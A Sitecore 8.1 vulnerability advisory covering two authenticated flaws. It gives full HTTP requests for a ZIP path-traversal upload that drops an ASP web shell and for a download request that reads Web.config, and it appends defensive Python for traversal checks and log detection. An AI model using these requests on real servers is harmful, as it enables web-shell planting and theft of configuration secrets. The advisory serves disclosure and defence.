Vulnerability Disclosure - Sitecore CRM 8.1

CVE-2017-5965, CVE-2017-5966
Publish date: May 19 2017
Vendor: Sitecore
Product: Sitecore
Versions affected: 8.1 Rev 151207
Fixed version: None
Author: Chris McCurley

Authenticated Arbitrary File Upload via Sitecore Package Manager

This vulnerability was subject to a 90-day disclosure timeframe after it was reported to the vendor in February 2017.

Using the Sitecore administrator web console, an authenticated administrator can upload files to any location on the web server file system. This is due to the way the package manager handles the ZIP file containing the package to be installed: entry names are extracted as-is, without being checked for path traversal sequences.

To replicate this issue, create a ZIP file containing an entry whose name includes ..\..\Website\sitecore\. The example below uses a ZIP file containing a file named ..\..\Website\sitecore\asp-shell.asp. The Unzip parameter must be set to 1 so that the archive is automatically unzipped once uploaded. The Overwrite parameter can be used if existing files, e.g. web.config, are to be overwritten.

POST /sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=<RANDOM-GUID> HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=
Cookie: <..snip..>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------14217273362068279630257947421
Content-Length: 2160

<..snip..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Unzip"

1
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Overwrite"

0
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326370957"; filename="asp-shell.zip"
Content-Type: application/zip

<..binary ZIP data snipped; the archive contains a single entry named ..\..\Website\sitecore\asp-shell.asp..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326371057"; filename=""
Content-Type: application/octet-stream


-----------------------------14217273362068279630257947421--

After the file extraction has automatically completed, the web shell asp-shell.asp is accessible at https://sitecore-instance/sitecore/asp-shell.asp.
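As an added example (not part of the advisory and not Sitecore's code), the check a package installer should run before extracting an archive: every entry name is normalised with backslashes treated as separators and rejected if it is absolute, carries a drive letter, or still contains a parent-directory component after normalisation; a package with any such entry is refused as a whole rather than partially installed. The sample archive is constructed in memory and holds one benign entry plus one using the traversal entry name from the advisory with placeholder content.

```python
import io
import posixpath
import zipfile
from typing import List


def is_unsafe_entry(name: str) -> bool:
    """True if a ZIP entry name could resolve outside the extraction directory."""
    # Treat backslashes as separators as well: the package manager runs on Windows,
    # and the advisory's entry name uses "..\\..\\" rather than "../../".
    normalized = name.replace("\\", "/")
    # Absolute paths and drive-letter prefixes (e.g. C:/...) never belong in a package.
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        return True
    # Collapse forms such as "a/../b" first, then reject any parent reference that survives.
    parts = posixpath.normpath(normalized).split("/")
    return ".." in parts


def unsafe_entries(zip_bytes: bytes) -> List[str]:
    """Names of all entries in the archive that fail the traversal check."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if is_unsafe_entry(name)]


def extract_checked(zip_bytes: bytes, dest: str) -> List[str]:
    """Refuse the whole archive if any entry is unsafe; otherwise extract and return the names."""
    bad = unsafe_entries(zip_bytes)
    if bad:
        raise ValueError(f"package rejected, unsafe entry names: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_sample_archive() -> bytes:
    """Constructed sample archive: one benign entry and one traversal entry with placeholder content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("package.xml", "<package />")
        # Entry name taken from the advisory; the content is a harmless placeholder.
        zf.writestr("..\\..\\Website\\sitecore\\asp-shell.asp", "placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print("unsafe entries in sample package:", unsafe_entries(build_sample_archive()))
```

The check is applied to the raw entry names from the central directory, not to paths after the platform's own extraction routine has rewritten them, because that is where a traversal name is visible before anything touches the file system.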

Authenticated Arbitrary File Download

A web application administrator can download arbitrary files that exist outside the web root directory. By design, the file parameter is populated with a GUID that identifies a specific file stored within the application. However, by supplying a full file system path in this parameter instead, it is possible to download the specified file (assuming the account the Sitecore application runs as has read access to it).

GET /sitecore/shell/download.aspx?file=c:\full\path\to\file\Web.config HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/Applications/Reports/LogViewer
Cookie: <..snip..>
Connection: close

The HTTP response returns the requested Web.config; a portion of it is shown below:

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24892
Content-Type: application/octet-stream; charset=utf-8
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Web.config"
Content-Transfer-Encoding: binary
X-UA-Compatible: IE=Edge,chrome=1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
x-frame-options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="sitecore" type="Sitecore.Configuration.ConfigReader, Sitecore.Kernel" />
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, Sitecore.Logging" />
    <section name="packageInstallation" type="Sitecore.Ship.Infrastructure.Configuration.PackageInstallationConfiguration, Sitecore.Ship.Infrastructure" />
    <section name="nancyFx" type="Nancy.Hosting.Aspnet.NancyFxSection" />
  </configSections>
  <connectionStrings configSource="App_Config\ConnectionStrings.config" />
  <appSettings>
  (...REDACTED...)
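Detection for the download issue, as an added example that is not part of the advisory: since the file parameter is populated with a GUID by design, any download.aspx request whose file value is not a GUID is worth alerting on, whether it carries a full path or a traversal sequence. The log lines are constructed for this example in IIS W3C extended format (field names as IIS writes them); the GUID, client addresses and user name are made up.

```python
import re
from typing import Dict, Iterator, List
from urllib.parse import parse_qs

# Constructed sample log in IIS W3C extended format (not taken from the advisory).
# Field names are the ones IIS writes; the GUID, addresses and user name are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2017-02-10 10:01:02 GET /sitecore/shell/download.aspx file=d3d7c4f4-d9fb-4b5d-9bdb-3d1c8a7b1a10 sitecore\\admin 10.0.0.5 200
2017-02-10 10:01:09 GET /sitecore/shell/download.aspx file=c%3A%5Cinetpub%5Cwwwroot%5CWebsite%5CWeb.config sitecore\\admin 10.0.0.5 200
2017-02-10 10:01:15 GET /sitecore/shell/download.aspx file=..%5C..%5CApp_Config%5CConnectionStrings.config sitecore\\admin 10.0.0.5 200
2017-02-10 10:02:00 GET /sitecore/content/home - - 10.0.0.7 200
"""

# The legitimate value is a GUID, optionally wrapped in braces as Sitecore often renders IDs.
GUID_RE = re.compile(r"^\{?[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}\}?$")
DOWNLOAD_STEM = "/sitecore/shell/download.aspx"


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names from the most recent #Fields line."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def suspicious_downloads(text: str) -> List[Dict[str, str]]:
    """Return download.aspx requests whose file parameter is not a GUID."""
    hits: List[Dict[str, str]] = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != DOWNLOAD_STEM:
            continue
        # parse_qs percent-decodes once, so %5C becomes a backslash and %3A a colon.
        query = parse_qs(rec.get("cs-uri-query", ""))
        for value in query.get("file", []):
            if GUID_RE.match(value):
                continue
            hits.append({
                "time": f"{rec.get('date', '-')} {rec.get('time', '-')}",
                "user": rec.get("cs-username", "-"),
                "client": rec.get("c-ip", "-"),
                "file": value,
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_downloads(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['user']} requested file={hit['file']!r}")
```

Matching on "not a GUID" rather than on a list of traversal patterns means an encoded, doubly encoded or UNC-style value is flagged as readily as the plain backslash form, and the rule stays valid for as long as the legitimate parameter is a GUID.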